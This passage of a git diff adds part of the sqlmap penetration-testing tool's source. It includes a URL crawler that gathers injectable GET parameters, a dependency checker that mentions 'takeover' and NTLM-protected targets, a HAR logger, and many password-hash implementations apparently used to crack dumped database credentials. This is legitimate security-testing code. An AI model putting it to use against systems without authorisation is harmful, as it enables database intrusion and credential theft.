found = False + logger.warning("'sitemap.xml' not found") + except: + pass + finally: + if found: + if items: + for item in items: + if re.search(r"(.*?)\?(.+)", item): + threadData.shared.value.add(item) + if conf.crawlDepth > 1: + threadData.shared.unprocessed.update(items) + logger.info("%s links found" % ("no" if not items else len(items))) + + if not conf.bulkFile: + infoMsg = "starting crawler for target URL '%s'" % target + logger.info(infoMsg) + + for i in xrange(conf.crawlDepth): + threadData.shared.count = 0 + threadData.shared.length = len(threadData.shared.unprocessed) + numThreads = min(conf.threads, len(threadData.shared.unprocessed)) + + if not conf.bulkFile: + logger.info("searching for links with depth %d" % (i + 1)) + + runThreads(numThreads, crawlThread, threadChoice=(i > 0)) + clearConsoleLine(True) + + if threadData.shared.deeper: + threadData.shared.unprocessed = set(threadData.shared.deeper) + else: + break + + except KeyboardInterrupt: + warnMsg = "user aborted during crawling. sqlmap " + warnMsg += "will use partial list" + logger.warning(warnMsg) + + finally: + clearConsoleLine(True) + + if not threadData.shared.value: + if not (conf.forms and threadData.shared.formsFound): + warnMsg = "no usable links found (with GET parameters)" + if conf.forms: + warnMsg += " or forms" + logger.warning(warnMsg) + else: + for url in threadData.shared.value: + kb.targets.add((urldecode(url, kb.pageEncoding), None, None, None, None)) + + if kb.targets: + if kb.normalizeCrawlingChoice is None: + message = "do you want to normalize " + message += "crawling results [Y/n] " + + kb.normalizeCrawlingChoice = readInput(message, default='Y', boolean=True) + + if kb.normalizeCrawlingChoice: + seen = set() + results = OrderedSet() + + for target in kb.targets: + value = "%s%s%s" % (target[0], '&' if '?' in target[0] else '?', target[2] or "") + match = re.search(r"/[^/?]*\?.+\Z", value) + if match: + key = re.sub(r"=[^=&]*", "=", match.group(0)).strip("&?") + if '=' in key and key not in seen: + results.add(target) + seen.add(key) + + kb.targets = results + + storeResultsToFile(kb.targets) + +def storeResultsToFile(results): + if not results: + return + + if kb.storeCrawlingChoice is None: + message = "do you want to store crawling results to a temporary file " + message += "for eventual further processing with other tools [y/N] " + + kb.storeCrawlingChoice = readInput(message, default='N', boolean=True) + + if kb.storeCrawlingChoice: + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CRAWLER, suffix=".csv" if conf.forms else ".txt") + os.close(handle) + + infoMsg = "writing crawling results to a temporary file '%s' " % filename + logger.info(infoMsg) + + with openFile(filename, "w+b") as f: + if conf.forms: + f.write("URL,POST\n") + + for url, _, data, _, _ in results: + if conf.forms: + f.write("%s,%s\n" % (safeCSValue(url), safeCSValue(data or ""))) + else: + f.write("%s\n" % url) diff --git a/src/sqlmap-master/lib/utils/deps.py b/src/sqlmap-master/lib/utils/deps.py new file mode 100644 index 0000000..4928c10 --- /dev/null +++ b/src/sqlmap-master/lib/utils/deps.py @@ -0,0 +1,144 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from lib.core.dicts import DBMS_DICT +from lib.core.enums import DBMS +from lib.core.settings import IS_WIN + +def checkDependencies(): + missing_libraries = set() + + for dbmsName, data in DBMS_DICT.items(): + if data[1] is None: + continue + + try: + if dbmsName in (DBMS.MSSQL, DBMS.SYBASE): + __import__("_mssql") + + pymssql = __import__("pymssql") + if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": + warnMsg = "'%s' third-party library must be " % data[1] + warnMsg += "version >= 1.0.2 to work properly. " + warnMsg += "Download from '%s'" % data[2] + logger.warning(warnMsg) + elif dbmsName == DBMS.MYSQL: + __import__("pymysql") + elif dbmsName in (DBMS.PGSQL, DBMS.CRATEDB): + __import__("psycopg2") + elif dbmsName == DBMS.ORACLE: + __import__("cx_Oracle") + elif dbmsName == DBMS.SQLITE: + __import__("sqlite3") + elif dbmsName == DBMS.ACCESS: + __import__("pyodbc") + elif dbmsName == DBMS.FIREBIRD: + __import__("kinterbasdb") + elif dbmsName == DBMS.DB2: + __import__("ibm_db_dbi") + elif dbmsName in (DBMS.HSQLDB, DBMS.CACHE): + __import__("jaydebeapi") + __import__("jpype") + elif dbmsName == DBMS.INFORMIX: + __import__("ibm_db_dbi") + elif dbmsName == DBMS.MONETDB: + __import__("pymonetdb") + elif dbmsName == DBMS.DERBY: + __import__("drda") + elif dbmsName == DBMS.VERTICA: + __import__("vertica_python") + elif dbmsName == DBMS.PRESTO: + __import__("prestodb") + elif dbmsName == DBMS.MIMERSQL: + __import__("mimerpy") + elif dbmsName == DBMS.CUBRID: + __import__("CUBRIDdb") + elif dbmsName == DBMS.CLICKHOUSE: + __import__("clickhouse_connect") + except: + warnMsg = "sqlmap requires '%s' third-party library " % data[1] + warnMsg += "in order to directly connect to the DBMS " + warnMsg += "'%s'. Download from '%s'" % (dbmsName, data[2]) + logger.warning(warnMsg) + missing_libraries.add(data[1]) + + continue + + debugMsg = "'%s' third-party library is found" % data[1] + logger.debug(debugMsg) + + try: + __import__("impacket") + debugMsg = "'python-impacket' third-party library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'python-impacket' third-party library for " + warnMsg += "out-of-band takeover feature. Download from " + warnMsg += "'https://github.com/coresecurity/impacket'" + logger.warning(warnMsg) + missing_libraries.add('python-impacket') + + try: + __import__("ntlm") + debugMsg = "'python-ntlm' third-party library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'python-ntlm' third-party library " + warnMsg += "if you plan to attack a web application behind NTLM " + warnMsg += "authentication. Download from 'https://github.com/mullender/python-ntlm'" + logger.warning(warnMsg) + missing_libraries.add('python-ntlm') + + try: + __import__("websocket._abnf") + debugMsg = "'websocket-client' library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'websocket-client' third-party library " + warnMsg += "if you plan to attack a web application using WebSocket. " + warnMsg += "Download from 'https://pypi.python.org/pypi/websocket-client/'" + logger.warning(warnMsg) + missing_libraries.add('websocket-client') + + try: + __import__("tkinter") + debugMsg = "'tkinter' library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'tkinter' library " + warnMsg += "if you plan to run a GUI" + logger.warning(warnMsg) + missing_libraries.add('tkinter') + + try: + __import__("tkinter.ttk") + debugMsg = "'tkinter.ttk' library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'tkinter.ttk' library " + warnMsg += "if you plan to run a GUI" + logger.warning(warnMsg) + missing_libraries.add('tkinter.ttk') + + if IS_WIN: + try: + __import__("pyreadline") + debugMsg = "'python-pyreadline' third-party library is found" + logger.debug(debugMsg) + except ImportError: + warnMsg = "sqlmap requires 'pyreadline' third-party library to " + warnMsg += "be able to take advantage of the sqlmap TAB " + warnMsg += "completion and history support features in the SQL " + warnMsg += "shell and OS shell. Download from " + warnMsg += "'https://pypi.org/project/pyreadline/'" + logger.warning(warnMsg) + missing_libraries.add('python-pyreadline') + + if len(missing_libraries) == 0: + infoMsg = "all dependencies are installed" + logger.info(infoMsg) diff --git a/src/sqlmap-master/lib/utils/getch.py b/src/sqlmap-master/lib/utils/getch.py new file mode 100644 index 0000000..76739b3 --- /dev/null +++ b/src/sqlmap-master/lib/utils/getch.py @@ -0,0 +1,81 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +class _Getch(object): + """ + Gets a single character from standard input. Does not echo to + the screen (reference: http://code.activestate.com/recipes/134892/) + """ + def __init__(self): + try: + self.impl = _GetchWindows() + except ImportError: + try: + self.impl = _GetchMacCarbon() + except(AttributeError, ImportError): + self.impl = _GetchUnix() + + def __call__(self): + return self.impl() + +class _GetchUnix(object): + def __init__(self): + __import__("tty") + + def __call__(self): + import sys + import termios + import tty + + fd = sys.stdin.fileno() + old_settings = termios.tcgetattr(fd) + try: + tty.setraw(sys.stdin.fileno()) + ch = sys.stdin.read(1) + finally: + termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) + return ch + +class _GetchWindows(object): + def __init__(self): + __import__("msvcrt") + + def __call__(self): + import msvcrt + return msvcrt.getch() + +class _GetchMacCarbon(object): + """ + A function which returns the current ASCII key that is down; + if no ASCII key is down, the null string is returned. The + page http://www.mactech.com/macintosh-c/chap02-1.html was + very helpful in figuring out how to do this. + """ + def __init__(self): + import Carbon + + getattr(Carbon, "Evt") # see if it has this (in Unix, it doesn't) + + def __call__(self): + import Carbon + + if Carbon.Evt.EventAvail(0x0008)[0] == 0: # 0x0008 is the keyDownMask + return '' + else: + # + # The event contains the following info: + # (what,msg,when,where,mod)=Carbon.Evt.GetNextEvent(0x0008)[1] + # + # The message (msg) contains the ASCII char which is + # extracted with the 0x000000FF charCodeMask; this + # number is converted to an ASCII character with chr() and + # returned + # + (what, msg, when, where, mod) = Carbon.Evt.GetNextEvent(0x0008)[1] + return chr(msg & 0x000000FF) + +getch = _Getch() diff --git a/src/sqlmap-master/lib/utils/har.py b/src/sqlmap-master/lib/utils/har.py new file mode 100644 index 0000000..bc9e881 --- /dev/null +++ b/src/sqlmap-master/lib/utils/har.py @@ -0,0 +1,233 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import base64 +import datetime +import io +import re +import time + +from lib.core.bigarray import BigArray +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.settings import VERSION +from thirdparty.six.moves import BaseHTTPServer as _BaseHTTPServer +from thirdparty.six.moves import http_client as _http_client + +# Reference: https://dvcs.w3.org/hg/webperf/raw-file/tip/specs/HAR/Overview.html +# http://www.softwareishard.com/har/viewer/ + +class HTTPCollectorFactory(object): + def __init__(self, harFile=False): + self.harFile = harFile + + def create(self): + return HTTPCollector() + +class HTTPCollector(object): + def __init__(self): + self.messages = BigArray() + self.extendedArguments = {} + + def setExtendedArguments(self, arguments): + self.extendedArguments = arguments + + def collectRequest(self, requestMessage, responseMessage, startTime=None, endTime=None): + self.messages.append(RawPair(requestMessage, responseMessage, + startTime=startTime, endTime=endTime, + extendedArguments=self.extendedArguments)) + + def obtain(self): + return {"log": { + "version": "1.2", + "creator": {"name": "sqlmap", "version": VERSION}, + "entries": [pair.toEntry().toDict() for pair in self.messages], + }} + +class RawPair(object): + def __init__(self, request, response, startTime=None, endTime=None, extendedArguments=None): + self.request = getBytes(request) + self.response = getBytes(response) + self.startTime = startTime + self.endTime = endTime + self.extendedArguments = extendedArguments or {} + + def toEntry(self): + return Entry(request=Request.parse(self.request), response=Response.parse(self.response), + startTime=self.startTime, endTime=self.endTime, + extendedArguments=self.extendedArguments) + +class Entry(object): + def __init__(self, request, response, startTime, endTime, extendedArguments): + self.request = request + self.response = response + self.startTime = startTime or 0 + self.endTime = endTime or 0 + self.extendedArguments = extendedArguments + + def toDict(self): + out = { + "request": self.request.toDict(), + "response": self.response.toDict(), + "cache": {}, + "timings": { + "send": -1, + "wait": -1, + "receive": -1, + }, + "time": int(1000 * (self.endTime - self.startTime)), + "startedDateTime": "%s%s" % (datetime.datetime.fromtimestamp(self.startTime).isoformat(), time.strftime("%z")) if self.startTime else None + } + out.update(self.extendedArguments) + return out + +class Request(object): + def __init__(self, method, path, httpVersion, headers, postBody=None, raw=None, comment=None): + self.method = method + self.path = path + self.httpVersion = httpVersion + self.headers = headers or {} + self.postBody = postBody + self.comment = comment.strip() if comment else comment + self.raw = raw + + @classmethod + def parse(cls, raw): + request = HTTPRequest(raw) + return cls(method=request.command, + path=request.path, + httpVersion=request.request_version, + headers=request.headers, + postBody=request.rfile.read(), + comment=request.comment, + raw=raw) + + @property + def url(self): + host = self.headers.get("Host", "unknown") + return "http://%s%s" % (host, self.path) + + def toDict(self): + out = { + "httpVersion": self.httpVersion, + "method": self.method, + "url": self.url, + "headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items()], + "cookies": [], + "queryString": [], + "headersSize": -1, + "bodySize": -1, + "comment": getText(self.comment), + } + + if self.postBody: + contentType = self.headers.get("Content-Type") + out["postData"] = { + "mimeType": contentType, + "text": getText(self.postBody).rstrip("\r\n"), + } + + return out + +class Response(object): + extract_status = re.compile(b'\\((\\d{3}) (.*)\\)') + + def __init__(self, httpVersion, status, statusText, headers, content, raw=None, comment=None): + self.raw = raw + self.httpVersion = httpVersion + self.status = status + self.statusText = statusText + self.headers = headers + self.content = content + self.comment = comment.strip() if comment else comment + + @classmethod + def parse(cls, raw): + altered = raw + comment = b"" + + if altered.startswith(b"HTTP response [") or altered.startswith(b"HTTP redirect ["): + stream = io.BytesIO(raw) + first_line = stream.readline() + parts = cls.extract_status.search(first_line) + status_line = "HTTP/1.0 %s %s" % (getText(parts.group(1)), getText(parts.group(2))) + remain = stream.read() + altered = getBytes(status_line) + b"\r\n" + remain + comment = first_line + + response = _http_client.HTTPResponse(FakeSocket(altered)) + response.begin() + + try: + content = response.read() + except _http_client.IncompleteRead: + content = raw[raw.find(b"\r\n\r\n") + 4:].rstrip(b"\r\n") + + return cls(httpVersion="HTTP/1.1" if response.version == 11 else "HTTP/1.0", + status=response.status, + statusText=response.reason, + headers=response.msg, + content=content, + comment=comment, + raw=raw) + + def toDict(self): + content = { + "mimeType": self.headers.get("Content-Type"), + "text": self.content, + "size": len(self.content or "") + } + + binary = set([b'\0', b'\1']) + if any(c in binary for c in self.content): + content["encoding"] = "base64" + content["text"] = getText(base64.b64encode(self.content)) + else: + content["text"] = getText(content["text"]) + + return { + "httpVersion": self.httpVersion, + "status": self.status, + "statusText": self.statusText, + "headers": [dict(name=key.capitalize(), value=value) for key, value in self.headers.items() if key.lower() != "uri"], + "cookies": [], + "content": content, + "headersSize": -1, + "bodySize": -1, + "redirectURL": "", + "comment": getText(self.comment), + } + +class FakeSocket(object): + # Original source: + # https://stackoverflow.com/questions/24728088/python-parse-http-response-string + + def __init__(self, response_text): + self._file = io.BytesIO(response_text) + + def makefile(self, *args, **kwargs): + return self._file + +class HTTPRequest(_BaseHTTPServer.BaseHTTPRequestHandler): + # Original source: + # https://stackoverflow.com/questions/4685217/parse-raw-http-headers + + def __init__(self, request_text): + self.comment = None + self.rfile = io.BytesIO(request_text) + self.raw_requestline = self.rfile.readline() + + if self.raw_requestline.startswith(b"HTTP request ["): + self.comment = self.raw_requestline + self.raw_requestline = self.rfile.readline() + + self.error_code = self.error_message = None + self.parse_request() + + def send_error(self, code, message): + self.error_code = code + self.error_message = message diff --git a/src/sqlmap-master/lib/utils/hash.py b/src/sqlmap-master/lib/utils/hash.py new file mode 100644 index 0000000..2a4514d --- /dev/null +++ b/src/sqlmap-master/lib/utils/hash.py @@ -0,0 +1,1313 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +try: + from crypt import crypt +except: # removed ImportError because of https://github.com/sqlmapproject/sqlmap/issues/3171 + from thirdparty.fcrypt.fcrypt import crypt + +try: + from Crypto.Cipher.DES import MODE_CBC as CBC + from Crypto.Cipher.DES import new as des +except: + from thirdparty.pydes.pyDes import CBC + from thirdparty.pydes.pyDes import des + +_multiprocessing = None + +import base64 +import binascii +import gc +import math +import os +import re +import tempfile +import time +import zipfile + +from hashlib import md5 +from hashlib import sha1 +from hashlib import sha224 +from hashlib import sha256 +from hashlib import sha384 +from hashlib import sha512 + +from lib.core.common import Backend +from lib.core.common import checkFile +from lib.core.common import clearConsoleLine +from lib.core.common import dataToStdout +from lib.core.common import getFileItems +from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite +from lib.core.common import isZipFile +from lib.core.common import normalizeUnicode +from lib.core.common import openFile +from lib.core.common import paths +from lib.core.common import readInput +from lib.core.common import singleTimeLogMessage +from lib.core.common import singleTimeWarnMessage +from lib.core.compat import xrange +from lib.core.convert import decodeBase64 +from lib.core.convert import decodeHex +from lib.core.convert import encodeHex +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.datatype import OrderedSet +from lib.core.enums import DBMS +from lib.core.enums import HASH +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.exception import SqlmapDataException +from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import COMMON_PASSWORD_SUFFIXES +from lib.core.settings import COMMON_USER_COLUMNS +from lib.core.settings import DEV_EMAIL_ADDRESS +from lib.core.settings import DUMMY_USER_PREFIX +from lib.core.settings import HASH_BINARY_COLUMNS_REGEX +from lib.core.settings import HASH_EMPTY_PASSWORD_MARKER +from lib.core.settings import HASH_MOD_ITEM_DISPLAY +from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD +from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT +from lib.core.settings import IS_WIN +from lib.core.settings import ITOA64 +from lib.core.settings import NULL +from lib.core.settings import ROTATING_CHARS +from lib.core.settings import UNICODE_ENCODING +from lib.core.wordlist import Wordlist +from thirdparty import six +from thirdparty.colorama.initialise import init as coloramainit +from thirdparty.six.moves import queue as _queue + +def mysql_passwd(password, uppercase=True): + """ + Reference(s): + https://web.archive.org/web/20120215205312/http://csl.sublevel3.org/mysql-password-function/ + + >>> mysql_passwd(password='testpass', uppercase=True) + '*00E247AC5F9AF26AE0194B41E1E769DEE1429A29' + """ + + password = getBytes(password) + + retVal = "*%s" % sha1(sha1(password).digest()).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def mysql_old_passwd(password, uppercase=True): # prior to version '4.1' + """ + Reference(s): + https://web.archive.org/web/20091205000600/http://www.sfr-fresh.com/unix/privat/tpop3d-1.5.5.tar.gz:a/tpop3d-1.5.5/password.c + https://github.com/pwnieexpress/pwn_plug_sources/blob/master/src/darkmysqli/DarkMySQLi.py + + >>> mysql_old_passwd(password='testpass', uppercase=True) + '7DCDA0D57290B453' + """ + + a, b, c = 1345345333, 7, 0x12345671 + + for d in password: + if d == ' ' or d == '\t': + continue + + e = ord(d) + a ^= (((a & 63) + b) * e) + (a << 8) + c += (c << 8) ^ a + b += e + + retVal = "%08lx%08lx" % (a & ((1 << 31) - 1), c & ((1 << 31) - 1)) + + return retVal.upper() if uppercase else retVal.lower() + +def postgres_passwd(password, username, uppercase=False): + """ + Reference(s): + http://pentestmonkey.net/blog/cracking-postgres-hashes/ + + >>> postgres_passwd(password='testpass', username='testuser', uppercase=False) + 'md599e5ea7a6f7c3269995cba3927fd0093' + """ + + username = getBytes(username) + password = getBytes(password) + + retVal = "md5%s" % md5(password + username).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def mssql_new_passwd(password, salt, uppercase=False): # since version '2012' + """ + Reference(s): + http://hashcat.net/forum/thread-1474.html + https://sqlity.net/en/2460/sql-password-hash/ + + >>> mssql_new_passwd(password='testpass', salt='4086ceb6', uppercase=False) + '0x02004086ceb6eb051cdbc5bdae68ffc66c918d4977e592f6bdfc2b444a7214f71fa31c35902c5b7ae773ed5f4c50676d329120ace32ee6bc81c24f70711eb0fc6400e85ebf25' + """ + + binsalt = decodeHex(salt) + unistr = b"".join((_.encode(UNICODE_ENCODING) + b"\0") if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in password) + + retVal = "0200%s%s" % (salt, sha512(unistr + binsalt).hexdigest()) + + return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) + +def mssql_passwd(password, salt, uppercase=False): # versions '2005' and '2008' + """ + Reference(s): + http://www.leidecker.info/projects/phrasendrescher/mssql.c + https://www.evilfingers.com/tools/GSAuditor.php + + >>> mssql_passwd(password='testpass', salt='4086ceb6', uppercase=False) + '0x01004086ceb60c90646a8ab9889fe3ed8e5c150b5460ece8425a' + """ + + binsalt = decodeHex(salt) + unistr = b"".join((_.encode(UNICODE_ENCODING) + b"\0") if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in password) + + retVal = "0100%s%s" % (salt, sha1(unistr + binsalt).hexdigest()) + + return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) + +def mssql_old_passwd(password, salt, uppercase=True): # version '2000' and before + """ + Reference(s): + www.exploit-db.com/download_pdf/15537/ + http://www.leidecker.info/projects/phrasendrescher/mssql.c + https://www.evilfingers.com/tools/GSAuditor.php + + >>> mssql_old_passwd(password='testpass', salt='4086ceb6', uppercase=True) + '0x01004086CEB60C90646A8AB9889FE3ED8E5C150B5460ECE8425AC7BB7255C0C81D79AA5D0E93D4BB077FB9A51DA0' + """ + + binsalt = decodeHex(salt) + unistr = b"".join((_.encode(UNICODE_ENCODING) + b"\0") if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in password) + + retVal = "0100%s%s%s" % (salt, sha1(unistr + binsalt).hexdigest(), sha1(unistr.upper() + binsalt).hexdigest()) + + return "0x%s" % (retVal.upper() if uppercase else retVal.lower()) + +def oracle_passwd(password, salt, uppercase=True): + """ + Reference(s): + https://www.evilfingers.com/tools/GSAuditor.php + http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/ + http://seclists.org/bugtraq/2007/Sep/304 + + >>> oracle_passwd(password='SHAlala', salt='1B7B5F82B7235E9E182C', uppercase=True) + 'S:2BFCFDF5895014EE9BB2B9BA067B01E0389BB5711B7B5F82B7235E9E182C' + """ + + binsalt = decodeHex(salt) + password = getBytes(password) + + retVal = "s:%s%s" % (sha1(password + binsalt).hexdigest(), salt) + + return retVal.upper() if uppercase else retVal.lower() + +def oracle_old_passwd(password, username, uppercase=True): # prior to version '11g' + """ + Reference(s): + http://www.notesbit.com/index.php/scripts-oracle/oracle-11g-new-password-algorithm-is-revealed-by-seclistsorg/ + + >>> oracle_old_passwd(password='tiger', username='scott', uppercase=True) + 'F894844C34402B67' + """ + + IV, pad = b"\0" * 8, b"\0" + + unistr = b"".join((b"\0" + _.encode(UNICODE_ENCODING)) if ord(_) < 256 else _.encode(UNICODE_ENCODING) for _ in (username + password).upper()) + + if des.__module__ == "Crypto.Cipher.DES": + unistr += b"\0" * ((8 - len(unistr) % 8) & 7) + cipher = des(decodeHex("0123456789ABCDEF"), CBC, iv=IV) + encrypted = cipher.encrypt(unistr) + cipher = des(encrypted[-8:], CBC, iv=IV) + encrypted = cipher.encrypt(unistr) + else: + cipher = des(decodeHex("0123456789ABCDEF"), CBC, IV, pad) + encrypted = cipher.encrypt(unistr) + cipher = des(encrypted[-8:], CBC, IV, pad) + encrypted = cipher.encrypt(unistr) + + retVal = encodeHex(encrypted[-8:], binary=False) + + return retVal.upper() if uppercase else retVal.lower() + +def md5_generic_passwd(password, uppercase=False): + """ + >>> md5_generic_passwd(password='testpass', uppercase=False) + '179ad45c6ce2cb97cf1029e212046e81' + """ + + password = getBytes(password) + + retVal = md5(password).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def sha1_generic_passwd(password, uppercase=False): + """ + >>> sha1_generic_passwd(password='testpass', uppercase=False) + '206c80413b9a96c1312cc346b7d2517b84463edd' + """ + + password = getBytes(password) + + retVal = sha1(password).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def apache_sha1_passwd(password, **kwargs): + """ + >>> apache_sha1_passwd(password='testpass') + '{SHA}IGyAQTualsExLMNGt9JRe4RGPt0=' + """ + + password = getBytes(password) + + return "{SHA}%s" % getText(base64.b64encode(sha1(password).digest())) + +def ssha_passwd(password, salt, **kwargs): + """ + >>> ssha_passwd(password='testpass', salt='salt') + '{SSHA}mU1HPTvnmoXOhE4ROHP6sWfbfoRzYWx0' + """ + + password = getBytes(password) + salt = getBytes(salt) + + return "{SSHA}%s" % getText(base64.b64encode(sha1(password + salt).digest() + salt)) + +def ssha256_passwd(password, salt, **kwargs): + """ + >>> ssha256_passwd(password='testpass', salt='salt') + '{SSHA256}hhubsLrO/Aje9F/kJrgv5ZLE40UmTrVWvI7Dt6InP99zYWx0' + """ + + password = getBytes(password) + salt = getBytes(salt) + + return "{SSHA256}%s" % getText(base64.b64encode(sha256(password + salt).digest() + salt)) + +def ssha512_passwd(password, salt, **kwargs): + """ + >>> ssha512_passwd(password='testpass', salt='salt') + '{SSHA512}mCUSLfPMhXCQOJl9WHW/QMn9v9sjq7Ht/Wk7iVau8vLOfh+PeynkGMikqIE8sStFd0khdfcCD8xZmC6UyjTxsHNhbHQ=' + """ + + password = getBytes(password) + salt = getBytes(salt) + + return "{SSHA512}%s" % getText(base64.b64encode(sha512(password + salt).digest() + salt)) + +def sha224_generic_passwd(password, uppercase=False): + """ + >>> sha224_generic_passwd(password='testpass', uppercase=False) + '648db6019764b598f75ab6b7616d2e82563a00eb1531680e19ac4c6f' + """ + + retVal = sha224(getBytes(password)).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def sha256_generic_passwd(password, uppercase=False): + """ + >>> sha256_generic_passwd(password='testpass', uppercase=False) + '13d249f2cb4127b40cfa757866850278793f814ded3c587fe5889e889a7a9f6c' + """ + + retVal = sha256(getBytes(password)).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def sha384_generic_passwd(password, uppercase=False): + """ + >>> sha384_generic_passwd(password='testpass', uppercase=False) + '6823546e56adf46849343be991d4b1be9b432e42ed1b4bb90635a0e4b930e49b9ca007bc3e04bf0a4e0df6f1f82769bf' + """ + + retVal = sha384(getBytes(password)).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def sha512_generic_passwd(password, uppercase=False): + """ + >>> sha512_generic_passwd(password='testpass', uppercase=False) + '78ddc8555bb1677ff5af75ba5fc02cb30bb592b0610277ae15055e189b77fe3fda496e5027a3d99ec85d54941adee1cc174b50438fdc21d82d0a79f85b58cf44' + """ + + retVal = sha512(getBytes(password)).hexdigest() + + return retVal.upper() if uppercase else retVal.lower() + +def crypt_generic_passwd(password, salt, **kwargs): + """ + Reference(s): + http://docs.python.org/library/crypt.html + http://helpful.knobs-dials.com/index.php/Hashing_notes + http://php.net/manual/en/function.crypt.php + http://carey.geek.nz/code/python-fcrypt/ + + >>> crypt_generic_passwd(password='rasmuslerdorf', salt='rl', uppercase=False) + 'rl.3StKT.4T8M' + """ + + return getText(crypt(password, salt)) + +def unix_md5_passwd(password, salt, magic="$1$", **kwargs): + """ + Reference(s): + http://www.sabren.net/code/python/crypt/md5crypt.py + + >>> unix_md5_passwd(password='testpass', salt='aD9ZLmkp') + '$1$aD9ZLmkp$DRM5a7rRZGyuuOPOjTEk61' + """ + + def _encode64(value, count): + output = "" + + while (count - 1 >= 0): + count = count - 1 + output += ITOA64[value & 0x3f] + value = value >> 6 + + return output + + password = getBytes(password) + magic = getBytes(magic) + salt = getBytes(salt) + + salt = salt[:8] + ctx = password + magic + salt + final = md5(password + salt + password).digest() + + for pl in xrange(len(password), 0, -16): + if pl > 16: + ctx = ctx + final[:16] + else: + ctx = ctx + final[:pl] + + i = len(password) + while i: + if i & 1: + ctx = ctx + b'\x00' # if ($i & 1) { $ctx->add(pack("C", 0)); } + else: + ctx = ctx + password[0:1] + i = i >> 1 + + final = md5(ctx).digest() + + for i in xrange(1000): + ctx1 = b"" + + if i & 1: + ctx1 = ctx1 + password + else: + ctx1 = ctx1 + final[:16] + + if i % 3: + ctx1 = ctx1 + salt + + if i % 7: + ctx1 = ctx1 + password + + if i & 1: + ctx1 = ctx1 + final[:16] + else: + ctx1 = ctx1 + password + + final = md5(ctx1).digest() + + hash_ = _encode64((int(ord(final[0:1])) << 16) | (int(ord(final[6:7])) << 8) | (int(ord(final[12:13]))), 4) + hash_ = hash_ + _encode64((int(ord(final[1:2])) << 16) | (int(ord(final[7:8])) << 8) | (int(ord(final[13:14]))), 4) + hash_ = hash_ + _encode64((int(ord(final[2:3])) << 16) | (int(ord(final[8:9])) << 8) | (int(ord(final[14:15]))), 4) + hash_ = hash_ + _encode64((int(ord(final[3:4])) << 16) | (int(ord(final[9:10])) << 8) | (int(ord(final[15:16]))), 4) + hash_ = hash_ + _encode64((int(ord(final[4:5])) << 16) | (int(ord(final[10:11])) << 8) | (int(ord(final[5:6]))), 4) + hash_ = hash_ + _encode64((int(ord(final[11:12]))), 2) + + return getText(magic + salt + b'$' + getBytes(hash_)) + +def joomla_passwd(password, salt, **kwargs): + """ + Reference: https://stackoverflow.com/a/10428239 + + >>> joomla_passwd(password='testpass', salt='6GGlnaquVXI80b3HRmSyE3K1wEFFaBIf') + 'e3d5794da74e917637332e0d21b76328:6GGlnaquVXI80b3HRmSyE3K1wEFFaBIf' + """ + + return "%s:%s" % (md5(getBytes(password) + getBytes(salt)).hexdigest(), salt) + +def django_md5_passwd(password, salt, **kwargs): + """ + Reference: https://github.com/jay0lee/GAM/blob/master/src/passlib/handlers/django.py + + >>> django_md5_passwd(password='testpass', salt='salt') + 'md5$salt$972141bcbcb6a0acc96e92309175b3c5' + """ + + return "md5$%s$%s" % (salt, md5(getBytes(salt) + getBytes(password)).hexdigest()) + +def django_sha1_passwd(password, salt, **kwargs): + """ + Reference: https://github.com/jay0lee/GAM/blob/master/src/passlib/handlers/django.py + + >>> django_sha1_passwd(password='testpass', salt='salt') + 'sha1$salt$6ce0e522aba69d8baa873f01420fccd0250fc5b2' + """ + + return "sha1$%s$%s" % (salt, sha1(getBytes(salt) + getBytes(password)).hexdigest()) + +def vbulletin_passwd(password, salt, **kwargs): + """ + Reference: https://stackoverflow.com/a/2202810 + + >>> vbulletin_passwd(password='testpass', salt='salt') + '85c4d8ea77ebef2236fb7e9d24ba9482:salt' + """ + + return "%s:%s" % (md5(binascii.hexlify(md5(getBytes(password)).digest()) + getBytes(salt)).hexdigest(), salt) + +def phpass_passwd(password, salt, count, prefix, **kwargs): + """ + Reference(s): + https://web.archive.org/web/20120219120128/packetstormsecurity.org/files/74448/phpassbrute.py.txt + 